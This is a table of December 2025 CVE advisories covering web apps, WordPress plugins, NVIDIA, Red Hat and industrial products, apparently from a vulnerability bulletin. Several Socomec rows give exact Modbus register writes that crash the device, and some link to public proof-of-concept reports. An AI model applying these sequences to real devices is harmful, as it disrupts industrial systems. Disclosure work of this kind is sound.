| moxi159753--Mogu Blog v2 | A security flaw has been discovered in moxi159753 Mogu Blog v2 up to 5.2. Impacted is the function LocalFileServiceImpl.uploadPictureByUrl of the file /file/uploadPicsByUrl. The manipulation results in server-side request forgery. The attack can be launched remotely. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 7.3 | CVE-2025-13814 | VDB-333823; moxi159753 Mogu Blog v2 uploadPicsByUrl LocalFileServiceImpl.uploadPictureByUrl server-side request forgery VDB-333823; CTI Indicators (IOB, IOC, IOA) Submit #692105; moxi159753 mogu_blog_v2 <=v5.2 Server-Side Request Forgery (SSRF) https://github.com/Xzzz111/exps/blob/main/archives/mogu_blog_v2-ssrf-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/mogu_blog_v2-ssrf-1/report.md#proof-of-concept |
| n/a--ABRT daemon | A flaw was found in the ABRT daemon's handling of user-supplied mount information. ABRT copies up to 12 characters from an untrusted input and places them directly into a shell command (docker inspect %s) without proper validation. An unprivileged local user can craft a payload that injects shell metacharacters, causing the root-running ABRT process to execute attacker-controlled commands and ultimately gain full root privileges. | 2025-12-03 | 8.8 | CVE-2025-12744 | https://access.redhat.com/security/cve/CVE-2025-12744 RHBZ#2412467 |
| n/a--Blood Bank Management System | A cross-site scripting (XSS) vulnerability exists in the Blood Bank Management System within the abs.php component. The application fails to properly sanitize or encode user-supplied input before rendering it in response. An attacker can inject malicious JavaScript payloads into the msg parameter, which is then executed in the victim's browser when the page is viewed. | 2025-12-01 | 8.5 | CVE-2025-63526 | https://github.com/Shridharshukl/Blood-Bank-Management-System https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63526.md |
| n/a--Blood Bank Management System 1.0 | A SQL injection vulnerability exists in the Blood Bank Management System 1.0 within the receiverLogin.php component. The application fails to properly sanitize user-supplied input in SQL queries, allowing an attacker to inject arbitrary SQL code. By manipulating the remail and rpassword fields, an attacker can bypass authentication and gain unauthorized access to the system. | 2025-12-01 | 10 | CVE-2025-63531 | https://github.com/Shridharshukl/Blood-Bank-Management-System https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63531.md |
| n/a--Blood Bank Management System 1.0 | An issue was discovered in Blood Bank Management System 1.0 allowing authenticated attackers to perform actions with escalated privileges via crafted request to delete.php. | 2025-12-01 | 9.6 | CVE-2025-63525 | https://github.com/Shridharshukl/Blood-Bank-Management-System https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63525.md |
| n/a--Blood Bank Management System 1.0 | A SQL injection vulnerability exists in the Blood Bank Management System 1.0 within the cancel.php component. The application fails to properly sanitize user-supplied input in SQL queries, allowing an attacker to inject arbitrary SQL code. By manipulating the search field, an attacker can bypass authentication and gain unauthorized access to the system. | 2025-12-01 | 9.6 | CVE-2025-63532 | https://github.com/Shridharshukl/Blood-Bank-Management-System https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63532.md |
| n/a--Blood Bank Management System 1.0 | A SQL injection vulnerability exists in the Blood Bank Management System 1.0 within the abs.php component. The application fails to properly sanitize user-supplied input in SQL queries, allowing an attacker to inject arbitrary SQL code. By manipulating the search field, an attacker can bypass authentication and gain unauthorized access to the system. | 2025-12-01 | 9.6 | CVE-2025-63535 | https://github.com/Shridharshukl/Blood-Bank-Management-System https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63535.md |
| n/a--Blood Bank Management System 1.0 | A cross-site scripting (XSS) vulnerability exists in the Blood Bank Management System 1.0 within the updateprofile.php and hprofile.php components. The application fails to properly sanitize or encode user-supplied input before rendering it in response. An attacker can inject malicious JavaScript payloads into the hname, hemail, hpassword, hphone, hcity parameters, which are then executed in the victim's browser when the page is viewed. | 2025-12-01 | 8.5 | CVE-2025-63527 | https://github.com/Shridharshukl/Blood-Bank-Management-System https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63527.md |
| n/a--Blood Bank Management System 1.0 | A cross-site scripting (XSS) vulnerability exists in the Blood Bank Management System 1.0 within the blooddinfo.php component. The application fails to properly sanitize or encode user-supplied input before rendering it in response. An attacker can inject malicious JavaScript payloads into the error parameter, which is then executed in the victim's browser when the page is viewed. | 2025-12-01 | 8.5 | CVE-2025-63528 | https://github.com/Shridharshukl/Blood-Bank-Management-System https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63528.md |
| n/a--Blood Bank Management System 1.0 | A cross-site scripting (XSS) vulnerability exists in the Blood Bank Management System 1.0 within the updateprofile.php and rprofile.php components. The application fails to properly sanitize or encode user-supplied input before rendering it in response. An attacker can inject malicious JavaScript payloads into the rname, remail, rpassword, rphone, rcity parameters, which are then executed in the victim's browser when the page is viewed. | 2025-12-01 | 8.5 | CVE-2025-63533 | https://github.com/Shridharshukl/Blood-Bank-Management-System https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63533.md |
| n/a--Blood Bank Management System 1.0 | A cross-site scripting (XSS) vulnerability exists in the Blood Bank Management System 1.0 within the login.php component. The application fails to properly sanitize or encode user-supplied input before rendering it in response. An attacker can inject malicious JavaScript payloads into the msg and error parameters, which are then executed in the victim's browser when the page is viewed. | 2025-12-01 | 8.5 | CVE-2025-63534 | https://github.com/Shridharshukl/Blood-Bank-Management-System https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63534.md |
| n/a--MediaCrush | A vulnerability was identified in MediaCrush 1.0.0/1.0.1. The affected element is an unknown function of the file /mediacrush/paths.py of the component Header Handler. Such manipulation of the argument Host leads to improper neutralization of http headers for scripting syntax. The attack can be launched remotely. | 2025-12-01 | 7.3 | CVE-2025-13803 | VDB-333813; MediaCrush Header paths.py http headers for scripting syntax VDB-333813; CTI Indicators (IOB, IOC, IOA) Submit #691857; MediaCrush 1.0 Improper Neutralization of HTTP Headers for Scripting Syntax https://github.com/lakshayyverma/CVE-Discovery/blob/main/mediacrush.md |
| n/a--PgBouncer | Untrusted search path in auth_query connection handler in PgBouncer before 1.25.1 allows an unauthenticated attacker to execute arbitrary SQL during authentication via a malicious search_path parameter in the StartupMessage. | 2025-12-03 | 7.5 | CVE-2025-12819 | https://www.pgbouncer.org/changelog.html#pgbouncer-125x |
| NI--LabVIEW | There is a relative path traversal vulnerability in the NI System Web Server that may result in information disclosure. Successful exploitation requires an attacker to send a specially crafted request to the NI System Web Server, allowing the attacker to read arbitrary files. This vulnerability existed in the NI System Web Server 2012 and prior versions. It was fixed in 2013. | 2025-12-04 | 7.5 | CVE-2025-12097 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/relative-path-traversal-vulnerability-in-ni-system-web-server.html |
| nutzam--NutzBoot | A security vulnerability has been detected in nutzam NutzBoot up to 2.6.0-SNAPSHOT. This impacts an unknown function of the file nutzboot-demo/nutzboot-demo-simple/nutzboot-demo-simple-web3j/src/main/java/io/nutz/demo/simple/module/EthModule.java of the component Transaction API. The manipulation of the argument from/to/wei leads to improper authorization. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. | 2025-12-01 | 7.3 | CVE-2025-13806 | VDB-333816; nutzam NutzBoot Transaction API EthModule.java improper authorization VDB-333816; CTI Indicators (IOB, IOC, TTP, IOA) Submit #692061; NutzBoot project (Nutz community) NutzBoot (Web3j starter + demo module) NutzBoot 2.6.0-SNAPSHOT Improper Access Control (Unauthenticated transaction API) https://github.com/Xzzz111/exps/blob/main/archives/nutzboot-UnauthorizedTransfer-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/nutzboot-UnauthorizedTransfer-1/report.md#vulnerability-details-and-poc |
| NVIDIA--TAO | NVIDIA TAO contains a vulnerability where an attacker may cause a resource to be loaded via an uncontrolled search path. A successful exploit of this vulnerability may lead to escalation of privileges, data tampering, denial of service, information disclosure. | 2025-12-03 | 8.8 | CVE-2025-33208 | https://nvd.nist.gov/vuln/detail/CVE-2025-33208 https://www.cve.org/CVERecord?id=CVE-2025-33208 https://nvidia.custhelp.com/app/answers/detail/a_id/5730 |
| NVIDIA--Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability where an attacker may cause an improper check for unusual or exceptional conditions issue by sending extra large payloads. A successful exploit of this vulnerability may lead to denial of service. | 2025-12-03 | 7.5 | CVE-2025-33201 | https://nvd.nist.gov/vuln/detail/CVE-2025-33201 https://www.cve.org/CVERecord?id=CVE-2025-33201 https://nvidia.custhelp.com/app/answers/detail/a_id/5734 |
| NVIDIA--Triton Inference Server | NVIDIA Triton Server for Linux contains a vulnerability where an attacker may cause an improper validation of specified quantity in input. A successful exploit of this vulnerability may lead to denial of service. | 2025-12-03 | 7.5 | CVE-2025-33211 | https://nvd.nist.gov/vuln/detail/CVE-2025-33211 https://www.cve.org/CVERecord?id=CVE-2025-33211 https://nvidia.custhelp.com/app/answers/detail/a_id/5734 |
| open-webui--open-webui | Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.37, a Server-Side Request Forgery (SSRF) vulnerability in Open WebUI allows any authenticated user to force the server to make HTTP requests to arbitrary URLs. This can be exploited to access cloud metadata endpoints (AWS/GCP/Azure), scan internal networks, access internal services behind firewalls, and exfiltrate sensitive information. No special permissions beyond basic authentication are required. This vulnerability is fixed in 0.6.37. | 2025-12-04 | 8.5 | CVE-2025-65958 | https://github.com/open-webui/open-webui/security/advisories/GHSA-c6xv-rcvw-v685 https://github.com/open-webui/open-webui/commit/02238d3113e966c353fce18f1b65117380896774 |
| open-webui--open-webui | Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.37, a Stored XSS vulnerability was discovered in Open-WebUI's Notes PDF download functionality. An attacker can import a Markdown file containing malicious SVG tags into Notes, allowing them to execute arbitrary JavaScript code and steal session tokens when a victim downloads the note as PDF. This vulnerability can be exploited by any authenticated user, and unauthenticated external attackers can steal session tokens from users (both admin and regular users) by sharing specially crafted markdown files. This vulnerability is fixed in 0.6.37. | 2025-12-04 | 8.7 | CVE-2025-65959 | https://github.com/open-webui/open-webui/security/advisories/GHSA-8wvc-869r-xfqf https://github.com/open-webui/open-webui/commit/03cc6ce8eb5c055115406e2304fbf7e3338b8dce |
| orionsec--orion-ops | A flaw has been found in orionsec orion-ops up to 5925824997a3109651bbde07460958a7be249ed1. Affected by this vulnerability is the function update of the file orion-ops-api/orion-ops-web/src/main/java/cn/orionsec/ops/controller/UserController.java of the component User Profile Handler. This manipulation of the argument ID causes improper authorization. The attack is possible to be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 7.3 | CVE-2025-13808 | VDB-333818; orionsec orion-ops User Profile UserController.java update improper authorization VDB-333818; CTI Indicators (IOB, IOC, TTP, IOA) Submit #692068; orionsec Orion-ops (server component) <= master commit 5925824997a3109651bbde07460958a7be249ed1 Improper Authorization / Horizontal Privilege Escalation https://github.com/Xzzz111/exps/blob/main/archives/orion-ops-privilege-escalation-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/orion-ops-privilege-escalation-1/report.md#proof-of-concept |
| pickplugins--User Verification by PickPlugins | The Email Verification, Email OTP, Block Spam Email, Passwordless login, Hide Login, Magic Login - User Verification plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 2.0.39. This is due to the plugin not properly validating that an OTP was generated before comparing it to user input in the "user_verification_form_wrap_process_otpLogin" function. This makes it possible for unauthenticated attackers to log in as any user with a verified email address, such as an administrator, by submitting an empty OTP value. | 2025-12-05 | 9.8 | CVE-2025-12374 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8ccb1304-326e-43af-b75d-23874f92ba8b?source=cve https://plugins.trac.wordpress.org/browser/user-verification/trunk/templates/email-otp-login-form/hook.php#L141 |
| Plesk--Plesk | WebPros Plesk before 18.0.73.5 and 18.0.74 before 18.0.74.2 on Linux allows remote authenticated users to execute arbitrary code as root via domain creation. The attacker needs "Create and manage sites" with "Domains management" and "Subdomains management." | 2025-12-03 | 7.8 | CVE-2025-66431 | https://docs.plesk.com/release-notes/obsidian/whats-new/ https://docs.plesk.com/release-notes/obsidian/change-log/#plesk-18074 https://support.plesk.com/hc/en-us/articles/36494997377687--CVE-2025-66431-Security-vulnerability-in-domain-creation-mechanism-allows-Plesk-users-to-execute-arbitrary-code-on-behalf-of-root |
| plugins360--All-in-One Video Gallery | The All-in-One Video Gallery plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the resolve_import_directory() function in versions 4.5.4 to 4.5.7. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-12-06 | 8.8 | CVE-2025-12966 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0b03bca1-84e3-4220-b39b-69044c42e9f9?source=cve https://plugins.trac.wordpress.org/changeset/3405593/all-in-one-video-gallery/trunk/admin/import-export.php |
| pnggroup--libpng | LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to 1.6.52, an out-of-bounds read vulnerability in libpng's simplified API allows reading up to 1012 bytes beyond the png_sRGB_base[512] array when processing valid palette PNG images with partial transparency and gamma correction. The PNG files that trigger this vulnerability are valid per the PNG specification; the bug is in libpng's internal state management. Upgrade to libpng 1.6.52 or later. | 2025-12-03 | 7.1 | CVE-2025-66293 | https://github.com/pnggroup/libpng/security/advisories/GHSA-9mpm-9pxh-mg4f https://github.com/pnggroup/libpng/issues/764 https://github.com/pnggroup/libpng/commit/788a624d7387a758ffd5c7ab010f1870dea753a1 https://github.com/pnggroup/libpng/commit/a05a48b756de63e3234ea6b3b938b8f5f862484a |
| RashminDungrani--online-banking | A vulnerability was found in RashminDungrani online-banking up to 2337ad552ea9d385b4e07b90e6f32d011b7c68a2. This affects an unknown part of the file /site/dist/auth_login.php. Manipulation of the argument Username results in SQL injection. The attack can be initiated remotely. The exploit has been made public and could be used. This product uses continuous delivery with rolling releases, so no version details of affected or updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 7.3 | CVE-2025-14192 | VDB-334612; RashminDungrani online-banking auth_login.php sql injection VDB-334612; CTI Indicators (IOB, IOC, TTP, IOA) Submit #699237; online-banking web 1 SQL Injection https://github.com/BrillBigbang/hole-gap/blob/main/online-banking-have-sql.docx |
| Red Hat--Red Hat Enterprise Linux 8 | A flaw was found in WebKitGTK. Processing malicious web content can cause an unexpected process crash due to improper memory handling. | 2025-12-04 | 8.8 | CVE-2025-66287 | RHSA-2025:22789 RHSA-2025:22790 https://access.redhat.com/security/cve/CVE-2025-66287 RHBZ#2418857 https://webkitgtk.org/security/WSA-2025-0009.html |
| Red Hat--Red Hat Enterprise Linux 8 | A flaw was found in WebKitGTK. This vulnerability allows remote, user-assisted information disclosure that can reveal any file the user is permitted to read by abusing the file drag-and-drop mechanism: WebKitGTK does not verify that drag operations originate from outside the browser. | 2025-12-03 | 7.4 | CVE-2025-13947 | RHSA-2025:22789 RHSA-2025:22790 https://access.redhat.com/security/cve/CVE-2025-13947 RHBZ#2418576 |
| Red Hat--Red Hat JBoss Enterprise Application Platform 8 | A flaw was found in Undertow that can cause remote denial of service attacks. When the server uses the FormEncodedDataDefinition.doParse(StreamSourceChannel) method to parse large form data encoding with application/x-www-form-urlencoded, the method will cause an OutOfMemory issue. This flaw allows unauthorized users to cause a remote denial of service (DoS) attack. | 2025-12-03 | 7.5 | CVE-2024-3884 | RHSA-2025:22773 RHSA-2025:22775 RHSA-2025:22777 RHSA-2025:3990 RHSA-2025:3992 https://access.redhat.com/security/cve/CVE-2024-3884 RHBZ#2275287 |
| rommapp--romm | RomM (ROM Manager) allows users to scan, enrich, browse and play their game collections with a clean and responsive interface. RomM contains multiple unrestricted file upload vulnerabilities that allow authenticated users to upload malicious SVG or HTML files. When these files are accessed, the browser executes the embedded JavaScript, leading to stored Cross-Site Scripting (XSS). Combined with a CSRF misconfiguration, this allows full administrative account takeover: creating a rogue admin account, escalating the attacker's account role to admin, and more. This vulnerability is fixed in 4.4.1 and 4.4.1-beta.2. | 2025-12-03 | 7.6 | CVE-2025-65027 | https://github.com/rommapp/romm/security/advisories/GHSA-v3c6-w996-f7hx |
| rtowebsites--PostGallery | The PostGallery plugin for WordPress is vulnerable to arbitrary file uploads due to incorrect file type validation in the 'PostGalleryUploader' class functions in all versions up to, and including, 1.12.5. This makes it possible for authenticated attackers, with subscriber-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-12-04 | 8.8 | CVE-2025-13543 | https://www.wordfence.com/threat-intel/vulnerabilities/id/13348eb5-5001-4ec4-bc6a-44795bbed203?source=cve https://plugins.trac.wordpress.org/browser/postgallery/tags/1.12.5/admin/PostGalleryUploader.php |
| Samsung Mobile--MotionPhoto | Improper access control in MPRemoteService of MotionPhoto prior to version 4.1.51 allows local attackers to start privileged service. | 2025-12-02 | 7.3 | CVE-2025-58481 | https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=12 |
| Samsung Mobile--MotionPhoto | Improper access control in MPLocalService of MotionPhoto prior to version 4.1.51 allows local attackers to start privileged service. | 2025-12-02 | 7.3 | CVE-2025-58482 | https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=12 |
| shabti--Frontend Admin by DynamiApps | The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to unauthorized modification of arbitrary WordPress options in all versions up to, and including, 3.28.20. This is due to insufficient capability checks and input validation in the ActionOptions::run() save handler. This makes it possible for unauthenticated attackers to modify critical WordPress options such as users_can_register, default_role, and admin_email via submitting crafted form data to public frontend forms. | 2025-12-03 | 9.8 | CVE-2025-13342 | https://www.wordfence.com/threat-intel/vulnerabilities/id/613f2035-3061-429b-b218-83805287e4f3?source=cve https://plugins.trac.wordpress.org/changeset/3400432/acf-frontend-form-element |
| sigstore--fulcio | Fulcio is a free-to-use certificate authority for issuing code signing certificates for an OpenID Connect (OIDC) identity. Prior to 1.8.3, function identity.extractIssuerURL splits (via a call to strings.Split) its argument (which is untrusted data) on periods. As a result, in the face of a malicious request with an (invalid) OIDC identity token in the payload containing many period characters, a call to extractIssuerURL incurs allocations to the tune of O(n) bytes (where n stands for the length of the function's argument), with a constant factor of about 16. This vulnerability is fixed in 1.8.3. | 2025-12-04 | 7.5 | CVE-2025-66506 | https://github.com/sigstore/fulcio/security/advisories/GHSA-f83f-xpx7-ffpw https://github.com/sigstore/fulcio/commit/765a0e57608b9ef390e1eeeea8595b9054c63a5a |
| sigstore--timestamp-authority | Sigstore Timestamp Authority is a service for issuing RFC 3161 timestamps. Prior to 2.0.3, function api.ParseJSONRequest splits (via a call to strings.Split) an optionally-provided OID (which is untrusted data) on periods. Similarly, function api.getContentType splits the Content-Type header (which is also untrusted data) on an application string. As a result, in the face of a malicious request with either an excessively long OID in the payload containing many period characters or a malformed Content-Type header, a call to api.ParseJSONRequest or api.getContentType incurs allocations of O(n) bytes (where n stands for the length of the function's argument). This vulnerability is fixed in 2.0.3. | 2025-12-04 | 7.5 | CVE-2025-66564 | https://github.com/sigstore/timestamp-authority/security/advisories/GHSA-4qg8-fj49-pxjh https://github.com/sigstore/timestamp-authority/commit/0cae34e197d685a14904e0bad135b89d13b69421 |
| Socomec--DIRIS Digiware M-70 | A denial of service vulnerability exists in the Modbus TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability. | 2025-12-01 | 8.6 | CVE-2024-48882 | https://talosintelligence.com/vulnerability_reports/TALOS-2024-2119 https://www.socomec.fr/sites/default/files/2025-04/CVE-2024-48882---Diris-Digiware-Webview-_VULNERABILITIES_2025-04-11-17-17-43_English_0.pdf |
| Socomec--DIRIS Digiware M-70 | A denial of service vulnerability exists in the Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability. | 2025-12-01 | 8.6 | CVE-2025-23417 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2139 https://www.socomec.fr/sites/default/files/2025-04/CVE-2025-23417---Diris-Digiware-Webview-_VULNERABILITIES_2025-04-11-17-16-19_English_0.pdf |
| Socomec--DIRIS Digiware M-70 | A buffer overflow vulnerability exists in the Modbus TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted set of network packets can lead to denial of service. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability. | 2025-12-01 | 8.6 | CVE-2025-26858 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2152 https://www.socomec.fr/sites/default/files/2025-10/CVE-2025-26858---Diris-Digiware-Mxx-Dxx-_VULNERABILITIES_2025-10-01-16-38-44_English_0.pdf |
| Socomec--DIRIS Digiware M-70 | A denial of service vulnerability exists in the Modbus TCP and Modbus RTU over TCP USB Function functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to a denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability. This vulnerability is specific to the malicious message sent via Modbus TCP over port 502. | 2025-12-01 | 8.6 | CVE-2025-55221 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2251 |
| Socomec--DIRIS Digiware M-70 | A denial of service vulnerability exists in the Modbus TCP and Modbus RTU over TCP USB Function functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to a denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability. This vulnerability is specific to the malicious message sent via Modbus RTU over TCP on port 503. | 2025-12-01 | 8.6 | CVE-2025-55222 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2251 |
| Socomec--DIRIS Digiware M-70 | A denial of service vulnerability exists in the Modbus TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to denial of service and weaken credentials resulting in default documented credentials being applied to the device. An attacker can send an unauthenticated packet to trigger this vulnerability. | 2025-12-01 | 7.2 | CVE-2024-49572 | https://talosintelligence.com/vulnerability_reports/TALOS-2024-2118 https://www.socomec.fr/sites/default/files/2025-04/CVE-2024-49572---Diris-Digiware-Webview-_VULNERABILITIES_2025-04-11-17-12-08_English_0.pdf |
| Socomec--DIRIS Digiware M-70 | A cross-site request forgery (CSRF) vulnerability exists in the WEBVIEW-M functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted HTTP request can lead to unauthorized access. An attacker can stage a malicious webpage to trigger this vulnerability. | 2025-12-01 | 7.5 | CVE-2024-53684 | https://talosintelligence.com/vulnerability_reports/TALOS-2024-2116 https://www.socomec.fr/sites/default/files/2025-10/CVE-2024-53684---Diris-Digiware-Mxx-Dxx-_VULNERABILITIES_2025-10-01-16-43-14_English_0.pdf |
| Socomec--DIRIS Digiware M-70 | A denial of service vulnerability exists in the Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to denial of service and weaken credentials resulting in default documented credentials being applied to the device. An attacker can send an unauthenticated packet to trigger this vulnerability. | 2025-12-01 | 7.2 | CVE-2025-20085 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2138 https://www.socomec.fr/sites/default/files/2025-04/CVE-2025-20085---Diris-Digiware-Webview-_VULNERABILITIES_2025-04-11-17-14-39_English_0.pdf |
| Socomec--DIRIS Digiware M-70 | A denial of service vulnerability exists in the Modbus TCP and Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted series of network requests can lead to a denial of service. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability. An attacker can trigger this denial-of-service condition by sending a sequence of Modbus TCP messages to port 502 using the Write Single Register function code (6). The attack sequence begins with a message to register 58112 with a value of 1000, indicating that a configuration change will follow. Next, a message is sent to register 29440 with a value corresponding to the new Modbus address to be configured. Finally, a message to register 57856 with a value of 161 commits the configuration change. After this configuration change, the device will be in a denial-of-service state. | 2025-12-01 | 7.5 | CVE-2025-54848 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2248 |
| Socomec--DIRIS Digiware M-70 | A denial of service vulnerability exists in the Modbus TCP and Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted series of network requests can lead to a denial of service. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability. An attacker can trigger this denial-of-service condition by sending a single Modbus TCP message to port 502 using the Write Single Register function code (6) to write the value 1 to register 4352. This action changes the Modbus address to 15. After this message is sent, the device will be in a denial-of-service state. | 2025-12-01 | 7.5 | CVE-2025-54849 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2248 |
| Socomec--DIRIS Digiware M-70 | A denial of service vulnerability exists in the Modbus TCP and Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted series of network requests can lead to a denial of service. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability. An attacker can trigger this denial-of-service condition by sending a sequence of Modbus RTU over TCP messages to port 503 using the Write Single Register function code (6). The attack sequence begins with a message to register 58112 with a value of 1000, indicating that a configuration change will follow. Next, a message is sent to register 29440 with a value corresponding to the new Modbus address to be configured. Finally, a message to register 57856 with a value of 161 commits the configuration change. After this configuration change, the device will be in a denial-of-service state. | 2025-12-01 | 7.5 | CVE-2025-54850 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2248 |
| Socomec--DIRIS Digiware M-70 | A denial of service vulnerability exists in the Modbus TCP and Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted series of network requests can lead to a denial of service. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability. An attacker can trigger this denial-of-service condition by sending a single Modbus TCP message to port 503 using the Write Single Register function code (6) to write the value 1 to register 4352. This action changes the Modbus address to 15. After this message is sent, the device will be in a denial-of-service state. | 2025-12-01 | 7.5 | CVE-2025-54851 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2248 |
| Socomec--Easy Config System | An authentication bypass vulnerability exists in the User profile management functionality of Socomec Easy Config System 2.6.1.0. A specially crafted database record can lead to unauthorized access. An attacker can modify a local database to trigger this vulnerability. | 2025-12-01 | 7.3 | CVE-2024-45370 | https://talosintelligence.com/vulnerability_reports/TALOS-2024-2117 https://www.socomec.fr/sites/default/files/2025-11/CVE-2024-45370---ECS-2610---CVSS31_VULNERABILITIES_2025-11-19-09-45-29_English_PLURI_3.pdf |
| Splunk--Splunk Enterprise | In Splunk Enterprise for Windows versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, a new installation of or an upgrade to an affected version can result in incorrect permissions assignment in the Splunk Enterprise for Windows Installation directory. This lets non-administrator users on the machine access the directory and all its contents. | 2025-12-03 | 8 | CVE-2025-20386 | https://advisory.splunk.com/advisories/SVD-2025-1205 |
| Splunk--Splunk Enterprise | In Splunk Universal Forwarder for Windows versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, a new installation of or an upgrade to an affected version can result in incorrect permissions assignment in the Universal Forwarder for Windows Installation directory. This lets non-administrator users on the machine access the directory and all its contents. | 2025-12-03 | 8 | CVE-2025-20387 | https://advisory.splunk.com/advisories/SVD-2025-1206 |
| Sprecher Automation--SPRECON-E-C | Sprecher Automation's SPRECON-E-C, SPRECON-E-P and SPRECON-E-T3 are vulnerable to attack by an unauthorized remote attacker via default cryptographic keys. The use of these keys allows the attacker to read, modify, and write projects and data, or to access any device via remote maintenance. | 2025-12-02 | 9.8 | CVE-2025-41742 | https://www.sprecher-automation.com/fileadmin/itSecurity/PDF/SPR-2511042_de.pdf |
| Sprecher Automation--SPRECON-E-C | Sprecher Automation's SPRECON-E series uses default cryptographic keys that allow an unprivileged remote attacker to access all encrypted communications, thereby compromising confidentiality and integrity. | 2025-12-02 | 9.1 | CVE-2025-41744 | https://www.sprecher-automation.com/fileadmin/itSecurity/PDF/SPR-2511043_de.pdf |
| stellarwp--Kadence WooCommerce Email Designer | The Kadence WooCommerce Email Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the customer name in all versions up to, and including, 1.5.17 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-02 | 7.2 | CVE-2025-13387 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1e0cf512-f676-4f47-abaa-5198998376b7?source=cve https://plugins.trac.wordpress.org/changeset/3399955/kadence-woocommerce-email-designer |
| strimzi--strimzi-kafka-operator | Strimzi provides a way to run an Apache Kafka cluster on Kubernetes or OpenShift in various deployment configurations. From 0.47.0 and prior to 0.49.1, in some situations, Strimzi creates an incorrect Kubernetes Role which grants the Apache Kafka Connect and Apache Kafka MirrorMaker 2 operands the GET access to all Kubernetes Secrets that exist in the given Kubernetes namespace. The issue is fixed in Strimzi 0.49.1. | 2025-12-05 | 7.4 | CVE-2025-66623 | https://github.com/strimzi/strimzi-kafka-operator/security/advisories/GHSA-xrhh-hx36-485q https://github.com/strimzi/strimzi-kafka-operator/commit/c8a14935e99c91eb0dd865431f46515da9f82ccc |
